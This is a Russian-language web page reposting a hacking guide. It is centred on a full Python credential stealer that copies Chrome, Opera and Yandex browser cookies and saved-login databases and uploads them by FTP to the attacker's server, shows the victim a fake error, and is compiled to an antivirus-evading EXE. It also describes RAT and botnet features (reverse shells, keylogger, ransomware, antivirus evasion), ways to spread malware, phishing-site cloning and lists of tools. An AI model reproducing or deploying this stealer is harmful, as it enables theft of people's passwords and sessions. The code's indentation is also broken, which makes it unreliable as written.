Хакер - не преступник. Взлом - для искусства. Смысл - в свободе — КиберПедия 

Папиллярные узоры пальцев рук - маркер спортивных способностей: дерматоглифические признаки формируются на 3-5 месяце беременности, не изменяются в течение жизни...

Архитектура электронного правительства: Единая архитектура – это методологический подход при создании системы управления государства, который строится...

Хакер - не преступник. Взлом - для искусства. Смысл - в свободе

2019-09-04 261
Хакер - не преступник. Взлом - для искусства. Смысл - в свободе 0.00 из 5.00 0 оценок
Заказать работу

Хакер - не преступник. Взлом - для искусства. Смысл - в свободе

 

Всем приятного чтения.

Вирусология

Вам не 5 лет, так что рассказывать, что такое вирус не буду, меньше воды, больше дела.

Написание стиллера

Напишем сегодня стиллер на пайтоне, и запакуем его в exe, чтоб он не палился антивирусами, по моим данным (1/67)

Начнем с самого простого: подключения библиотек.

Python:

import os.path

import getpass

from ftplib import FTP

import random

con = FTP("хост","логин","пароль")

 

Первая библиотека (os.path) - используется для проверки директории на валидность, точнее на то, существует ли она в природе.

Вторая библиотека (getpass) - используется для получения юзернейма пользователя, под которым запущен процесс, это нужно для доступа к папке AppData.

Третья библиотека (ftplib) - тут самое интересное, она нам поможет отправлять пароли по FTP на наш сервер.

Четвертая библиотека(random) - ну тут все просто, мы рандомизируем названия файла, который отправляем на сервер.

И напоследок, мы подключаемся по ftp по логину, паролю и хосту.

Теперь перейдем к более интересным вещам, чем просто библиотеки, напишем уже сами пути к директориям, где лежат наши пароли, а пароли будем воровать (в учеб.целях) из браузеров - Opera, Yandex, Google Chrome

 

Итак, вот код, пишем его, далее будем его разбирать

Python:

UserName = '\\' + getpass.getuser()

dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'

dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

 

dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"

dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"

 

dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"

dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"

UserName - принимает значения имя текущего пользователя

dir_cookie_google, dir_pass_google,....,... - и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже....

 

У нас имеются директории, у нас есть библиотеки для работы, что же дальше? Пора приступать к основной задаче - написанию стиллера.

 

Вот код, пока напишите его, а я потом расскажу о нем))Python:

dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"

dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"

dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"

dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

 

def check():

if (os.path.exists(dir_google)) == True:

   filename = "google"+str(random.randint(1, 10000))

   filename2 = "google_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_google, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_google, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_opera)) == True:

   filename = "opera"+str(random.randint(1, 10000))

   filename2 = "opera_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_opera, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_opera, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_yandex)) == True:

   filename = "yandex"+str(random.randint(1, 10000))

   filename2 = "yandex_pass" + str(random.randint(1, 10000))

     with open(dir_cookie_yandex, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_yandex, "rb") as content:

Код получился не маленький, что есть то есть. Рассмотрим первые строчки. В начале, до функции, мы записываем в переменные адреса наших директорий для последующей проверки на валидность. "Зачем это нужно?", - спросите вы меня. Да так проще! Зачем ставить try, except, если можно проверить на валидность с помощью os.path.exits.

 

Далее у идет функция, со множествами if, но тут ничего ничего сложного нет, все просто:Python:

 if (os.path.exists(dir_google)) == True:

   filename = "google"+str(random.randint(1, 10000))

   filename2 = "google_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_google, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_google, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

Мы проверяем, является ли директория валидной, а после открываем ее, и отправляем файл на наш сервер FTP. Такс... Функцию написали, библиотеки подключили, директории есть. Чего не хватает? Думаю, не хватает задействовать функцию и вывести на экран какую-нибудь псевдо-ошибку, что мол библиотека не подключена и все дела. Будем действовать по такой схеме))

 

Вот код:

Python:

check()

print("Error library import HOUII.dll")

print("Error RUN cheat")

input()

Первая строка - вызов функции, которая ворует пароли.

 

Далее выводим сообщения об "ошибке", чтобы пользователь думал, что это у него проблемы какие то. И что программа не зловредная, а наоборот, пыталась помочь. Но, как оказалось, библиотеки видите ли у него нет))

 

Вот и весь код, ниже он целиком:

Python:

import os.path

import getpass

from ftplib import FTP

import random

 

con = FTP("хост","логин","пароль")

 

"""

Hack to directory

"""

UserName = '\\' + getpass.getuser()

 

dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'

dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"

dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"

dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"

dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"

dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"

dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"

dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"

dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

 

def check():

if (os.path.exists(dir_google)) == True:

   filename = "google"+str(random.randint(1, 10000))

   filename2 = "google_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_google, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_google, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_opera)) == True:

   filename = "opera"+str(random.randint(1, 10000))

   filename2 = "opera_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_opera, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_opera, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

if (os.path.exists(dir_yandex)) == True:

   filename = "yandex"+str(random.randint(1, 10000))

   filename2 = "yandex_pass" + str(random.randint(1, 10000))

   with open(dir_cookie_yandex, "rb") as content:

       con.storbinary("STOR %s" % filename, content)

   with open(dir_pass_yandex, "rb") as content:

       con.storbinary("STOR %s" % filename2, content)

 

check()

print("Error library import HOUII.dll")

print("Error RUN cheat")

input()

 

У нас есть код, но он на пайтоне, как же его эксплуатировать на чужом ПК?

Ответ - pyinstaller

Скачаем его:

Bash:

pip install pyinstaller

Далее скомпилируем его в EXE'шник, дабы было все проще))

Bash:

pyinstaller -F <my_script>.py

Вот и все, по сути у нас есть EXE файл, который не палится антивирусами, ну разве что windows защитник может его заподозрить, все же мы ходим по директориям. Кроме того еще и отправляем файлы на какой то не понятный сервер.... НО на практике kaspersky, dr.web, и др популярные антивирусы не определяют его как вредоносное программное обеспечения, даже если ему тыкнуть носом, вот мол, смотри, давай его просканируем, может там вирусы трояны бэкдоры! он говорит - нет, там нету ничего....

Написание RAT

RAT — аббревиатура англ. Remote Access Trojan, в переводе — «Троян удаленного доступа» или «средство удалённого управления» Термин получил распространение среди системных администраторов и хакеров. Стоит отметить что, чаще всего этот термин используют крэкеры, понимая под этим утилиту для несанкционированного доступа к системе удаленного пользователя с корыстными целями.

Revenge-Rat 0.3 - программа с автоматической, скрытой установкой, служащая для удаленного управления компьютерами и скрытного

наблюдения за пользователями захваченных систем.  

Функционал:

- Получение различной информации о удаленной системе;

- Отображение запущенных процессов, установленных программ, автозагрузки;

- Встроенный менеджер файлов с помощью которого можно стащить файлы с удаленной машины или наоборот закинуть туда свои файлы;

- Удаленное управление рабочим столом;

- Наблюдение через web-камеру, прослушка помещения через микрофон;

- Встроенный кейлоггер с захватом буфера обмена и стилер паролей;

- Редактирование файла hosts (можно перенаптавлять жертву на фейковые сайты);

- Лоадер файлов с функцией обновления трояна, а также загрузкой и запуском дополнительного софта;

- Удаленный доступ к командной строке и многое другое;
 

Ну это уже тема для отдельной книги,а если хотите в этом разберетесь сами

 

Сервер

usage: server.py [-h] [-v] [--host HOST] [--port PORT] [--database DATABASE]

Команды и контроль Сервера с постоянной базой данных и консолью

§ Консольный интерфейс пользователя: оптимизированный консольный интерфейс для удаленного управления клиентскими хост-компьютерами через обратные TCP-оболочки, которые обеспечивают прямой доступ к клиентским хост-машинам

§ Постоянная база данных SQLite: легкая база данных, в которой хранится идентификационная информация о клиентских машинах-хостах, что позволяет проводить сеансы обратной TCP-оболочки с помощью разрывов произвольной продолжительности и обеспечения долгосрочной разведки

§ Архитектура клиент-сервер: все локальные пакеты / модули python автоматически становятся доступными для удаленного доступа клиентов, не записывая их на диск целевых компьютеров, что позволяет клиентам использовать модули, которые требуют пакетов, не установленных на целевых компьютерах

Клиент

usage: client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--obfuscate] [--compress] [--compile] host port [module [module...]]

Вы можете создавать полностью необнаруживаемые клиенты с поставленной полезной нагрузкой, удаленным импортом и неограниченными модулями

§ Удаленный импорт: может удаленно импортировать сторонние пакеты с сервера, не записывая их на диск или не загружая / не устанавливая их

§ Ничего не записано на диск: клиенты никогда ничего не пишут на диск — даже временные файлы (нулевые системные вызовы ввода-вывода выполняются), потому что удаленный импорт позволяет динамически загружать произвольный код в память и напрямую импортировать в текущий процесс

§ Zero Dependencies (не даже сам Python): клиент работает только с стандартной библиотекой python, удаленно импортирует любые нестандартные пакеты / модули с сервера и может быть скомпилирован с помощью автономного интерпретатора python в переносимый исполняемый файл, отформатированный для любой платформы / архитектура, позволяющая ему работать на чем угодно, даже если сам Python отсутствует на целевом хосте

§ Добавление новых функций с помощью всего лишь 1 Щелчка: любой скрипт, модуль или пакет python, который вы должны копировать в./byob/modules/directory, автоматически становится удаленно импортируемым и напрямую использоваться каждым клиентом, пока запущен ваш сервер управления и управления

§ Напишите свои собственные модули: базовый шаблон модуля предоставляется в каталоге./byob/modules/, чтобы написать собственные модули прямолинейным процессом

§ Запуск неограниченных модулей без раздувания Размера файла: использование удаленного импорта для добавления неограниченных функций без добавления ни одного байта в размер файла клиента

§ Полностью обновляемый: каждый клиент будет периодически проверять сервер на наличие нового контента, доступного для удаленного импорта, и будет динамически обновлять свои ресурсы в памяти, если что-либо добавлено / удалено

§ Независимая платформа: все написано на языке Python, и сгенерированные клиенты могут быть необязательно скомпилированы в переносимый исполняемый файл (Windows) или в комплекте с автономным приложением (macOS)

§ Обход межсетевых экранов: клиенты подключаются к серверу управления и управления через обратные TCP-соединения, которые обходят большинство брандмауэров, потому что конфигурации фильтра по умолчанию в основном блокируют входящие соединения

§ Counter-Measure Against Antivirus: избегает анализа антивирусом, блокируя процессы с именами известных антивирусных продуктов от нереста

§ Шифрование полезных нагрузок для предотвращения анализа: основная полезная нагрузка клиента зашифровывается случайным 256-битным ключом, который существует исключительно в блоке полезной нагрузки, который создается вместе с ним

§ Предотвращение обратного проектирования: по умолчанию клиенты прекращают выполнение, если обнаружена виртуальная машина или песочница

 

Модули

 

11 пост-эксплуатационных модулей, которые удаленно импортируются клиентами

§ Keylogger (byob.modules.keylogger): регистрирует нажатия клавиш пользователя и введенное имя окна

§ Снимок экрана (byob.modules.screenshot): сделайте снимок экрана рабочего стола текущего пользователя

§ Веб-камера (byob.modules.webcam): просмотр прямого потока или захват изображения / видео с веб-камеры

§ Ransom (byob.modules.ransom): шифрует файлы и генерирует случайный кошелек BTC для оплаты выкупа

§ Outlook (byob.modules.outlook): чтение / поиск / отправка писем из локального клиента Outlook

§ Packet Sniffer (byob.modules.packetsniffer): запустить пакетный снифер в сети хоста и загрузить файл.pcap

§ Persistence (byob.modules.persistence): установить постоянство на главной машине, используя 5 различных методов

§ Телефон (byob.modules.phone): чтение / поиск / загрузка текстовых сообщений с клиентского смартфона

§ Эскалация привилегий (byob.modules.escalate): попытка обхода UAC для получения несанкционированных прав администратора

§ Port Scanner (byob.modules.portscanner): сканирование локальной сети для других сетевых устройств и открытых портов

§ Управление процессом (byob.modules.process): list / search / kill / мониторинг текущих запущенных процессов на хосте

 

 

Способы распространения

1.6.1 Электронные письма с вложениями (файлами)

Это очень простой способ разослать вирус по электронной почте, прикрепив заражённый файл к письму. Большинство людей открывает неопознанные входящие письма из простого любопытства, получая впоследствии проблемы. Способ защититься от подобного прост: нужно удалять письма, пришедшие от неопознанных пользователей, не открывая их. Не смотря на кажущуюся радикальность, это самая разумная мера в данном случае.

1.6.2 Заражённое программное обеспечение

Схема заражения компьютера вирусами в этом случае элементарна – пользователь просто загружает на свой компьютер заражённую программу и устанавливает её. Мало кто хочет платить за лицензии программ – все хотят халявы. Тем более, что сегодня в Интернете можно скачать всё что угодно.

1.6.3 USB-флешки

В этом случае наиболее подвергнуты заражению те пользователи, чей антивирус не поддерживает проверку флеш накопителей на лету. Флешки сегодня распространены повсеместно, и именно поэтому заражение компьютеров посредством переноса вирусов через USB-накопители так распространено.

1.6.4 Сеть

Если ваш компьютер является частью какой-нибудь сети, даже домашней – велик риск заразить все компьютеры этой сети с одного.

Фишинг

Речь идёт о фальшивых сайтах, переходя на которые, пользователь часто получает автоматически устанавливаемые вирусы и шпионские программы. В результате фишинга нередко теряются не только данные, но и личные сбережения. Поэтому прежде чем переходить по фишинговым ссылкам, сообщающим вам о якобы каких-то проблемах с вашим банковским счетом, лучше просто позвонить в банк, и не переходить ни по каким ссылкам.

Лже антивирусные программы

Это очень распространённый путь инфицирования персональных компьютеров. Никогда не скачивайте антивирус из непроверенного источника – всегда делайте это только с официального сайта антивирусной программы. Иначе вы подвергните свой компьютер повышенному риску инфицирования. Покупка лицензии – оптимальный способ защиты в этом случае.

 

Фишинговые сайты

Копирование сайтов

 Webparse.ru

Условно-бесплатный ресурс, позволяющий один раз воспользоваться его услугами бесплатно, после чего за скачивание сайтов придется платить.

Работает webparse.ru быстрее предыдущего ресурса, но делает это не бесплатно. В итоге получаем архив со скачанным сайтом. В настройках нет настройки глубины парсинга структуры скачиваемого сайта, поэтому убедиться, что удалось скачать сайт полностью, придется только самостоятельной сверкой оригинала и его копии.

    2.2 Админ панель

                       
AdminLTE – A Clean Admin Theme

 

Брут

 

Что такое брут и как его проводить я объяснять не буду, а вот библиотеки

https://forum.antichat.ru/threads/281655/

 

Linux

Когда вы узнаете какие существуют хакерские утилиты и методы взлома, то сможете сделать свою систему более безопасной. Вы сможете проверить свою систему на подверженность той или иной атаке. Сейчас в интернете никто не застрахован, даже такие крупные сайты как Twitter и Facebook.

А теперь перейдем к списку.

1. Jhon The Ripper

2. 2. Aircrack-ng

3. 3. THC Hydra

4. Burp Suite

5. WireShark

6. OWASP Zed

7. Maltego

8. Metasploit

9. Acunetix

10. Nmap

11. Cain and Abel

12. Nikto Website Vulnerability Scanner

13. Social-Engineer Toolkit

 

 

Анонимность

Пример: У меня есть андроид аппарат

1) Я первым делом ищу прошивку CyanogenMod для своего аппарата (если не хотите менять прошивку хотя бы сделайте root для своего аппарата), можно найти здесь http://4pda.ru/forum/index.php?showforum=268 и ищите свой аппарат. Или здесь http://forum.xda-developers.com/ делаете все по инструкции (как что делать сами ищите там все подробно написано), после прошивки делаем root (это тоже там можно сделать)

Установка MicBlock и CamBlock найдете в Apkpure (смотрите в 4) разделе, по названнию думаю понятно, что делают эти проги. Блокируют Микрофон и камеру тоесть приложения уже не смогут включить их без вашего ведома

Secrecy-есть в F droid. Приложение для шифрования в aes256 (аудио,видео,фото)

Для пк

VPN

· Cyber Ghost — бесплатный VPN для компьютера.

· Windscribe — ещё один бесплатный кроссплатформенный VPN.

· BetterNet — бесплатный VPN для мобильных устройств.

· Nord VPN — платный VPN.

· Avira — бесплатный VPN.

Обзор VPN провайдеров, за которые можно расплатитьсяв криптовалюте.

Анонимайзеры

· Privatoria — Tor + VPN.

· HMA — бесплатный прокси-сервер.

· Seedr — приватное скачивание торрентов.

Безопасные мессенджеры

· Wickr — бесплатная система обмена сообщениями для компьютера и мобильных устройств.

· Signal — еще одна бесплатная система обмена сообщениями для компьютера и мобильных устройств.

· Silent Circle — платные решения для безопасной коммуникации.

Шифрование диска

· TrueCrypt — последняя проверенная версия ПО для полнодискового шифрования и создания контейнеров.

· VeraCrypt — аналог TrueCrypt.

· Bitlocker — настройка Bitlocker для Windows.

· FileVault — настройка FileVault 2 для Mac OS.

Пароли

· PassWare — взлом забытых паролей.

· 7-Zip — архиватор, поддерживающий 7-zip, для Windows.

· Keka — архиватор, поддерживающий 7-zip, для MacOS.

· Randomize — проверка стойкости пароля.

· SafePasswd — генератор надежных паролей, которые легко запомнить.

· Keychain Access — обзор встроенного менеджера паролей для Mac.

· 1-Password — универсальный менеджер паролей.

· Lindy — аппаратные блокираторы портов.

Мультифакторная авторизация

· Knock — вход в компьютер без ввода пароля.

· Unlox — вход в компьютер без ввода пароля или с использованием комбинации TouchID.

· Securenvoy — двухфакторная авторизация.

· Centrify — мультифакторная авторизация в компании.

· Predator — USB-ключ для компьютера на Windows.

· Rohos — USB-ключ для компьютера на Windows.

· USB Lock — USB-ключ для Mac.

Метаданные

· Список утилит для удаления метаданных из документов.

· Fenwick & West — исчерпывающая презентация о возможных юридических рисках и прецедентах, связанных с небрежным обращением с метаданными.

· Metapicz — обработка EXIF-информации из фото.

· TinEye — поиск картинок в интернете.

Защита от кражи устройств

· LockWatch — защита для Android.

· Find My iPhone — защита для устройств Apple.

Браузеры

· Epic Privacy Browser — безопасный браузер со встроенным VPN.

· Puffin (iOS) — безопасный браузер для мобильных устройств.

· Puffin (Android) — безопасный браузер для мобильных устройств.

· Tor — анонимный браузер Tor.

· I2P — доступ к теневому интернету.

Виртуальные рабочие станции

· VirtualBox — бесплатная виртуальная машина.

· VMWare — самая популярная виртуальная машина.

· Parallels — лучшая виртуальная машина для Mac.

Удаление информации

· Disk Utility — форматирование дисков для Mac.

· Eraser — очистка диска, полное удаление файлов.

· CCleaner — очистка нежелательной информации.

Сетевые экраны

· TinyWall — контроль над встроенным сетевым экраном Windows.

· ZoneAlarm — один из лучших бесплатных сетевых экранов для Windows.

· LittleSnitch — самый популярный сетевой экран для Mac.

· Private Eye — бесплатный монитор сетевых подключений для Mac.

DNS

· Google DNS — настройки DNS от Google.

· Open DNS — настройки DNS от Open DNS.

· DNS.Watch — DNS-сервис без журналирования.

Анонимные почтовые службы

· Tutanota, Mailfence, Posteo, CoutnerMail — обмен зашифрованными сообщениями.

· ProtonMail — зашифрованный почтовый ящик. Используйте при передаче информации. Создайте почту на ProtonMail, поделитесь ключами к ней с источником. Не отправляя письма, через черновики обменивайтесь информацией друг с другом. Не забывайте удалять их.

· BitMessage — анонимный почтовый ящик с доступом через сеть Tor.

«Облачные» хранилища

· Tresorit — безопасное облачное хранилище.

Перехват сетевого трафика

· WireShark — захват и реконструкция пакетов.

· Elcomsoft Wireless Security Auditor — аудит сетевой безопасности.

Хакер - не преступник. Взлом - для искусства. Смысл - в свободе

 

Всем приятного чтения.

Вирусология

Вам не 5 лет, так что рассказывать, что такое вирус не буду, меньше воды, больше дела.


Поделиться с друзьями:

Типы сооружений для обработки осадков: Септиками называются сооружения, в которых одновременно происходят осветление сточной жидкости...

Организация стока поверхностных вод: Наибольшее количество влаги на земном шаре испаряется с поверхности морей и океанов (88‰)...

Наброски и зарисовки растений, плодов, цветов: Освоить конструктивное построение структуры дерева через зарисовки отдельных деревьев, группы деревьев...

История создания датчика движения: Первый прибор для обнаружения движения был изобретен немецким физиком Генрихом Герцем...



© cyberpedia.su 2017-2024 - Не является автором материалов. Исключительное право сохранено за автором текста.
Если вы не хотите, чтобы данный материал был у нас на сайте, перейдите по ссылке: Нарушение авторских прав. Мы поможем в написании вашей работы!

0.009 с.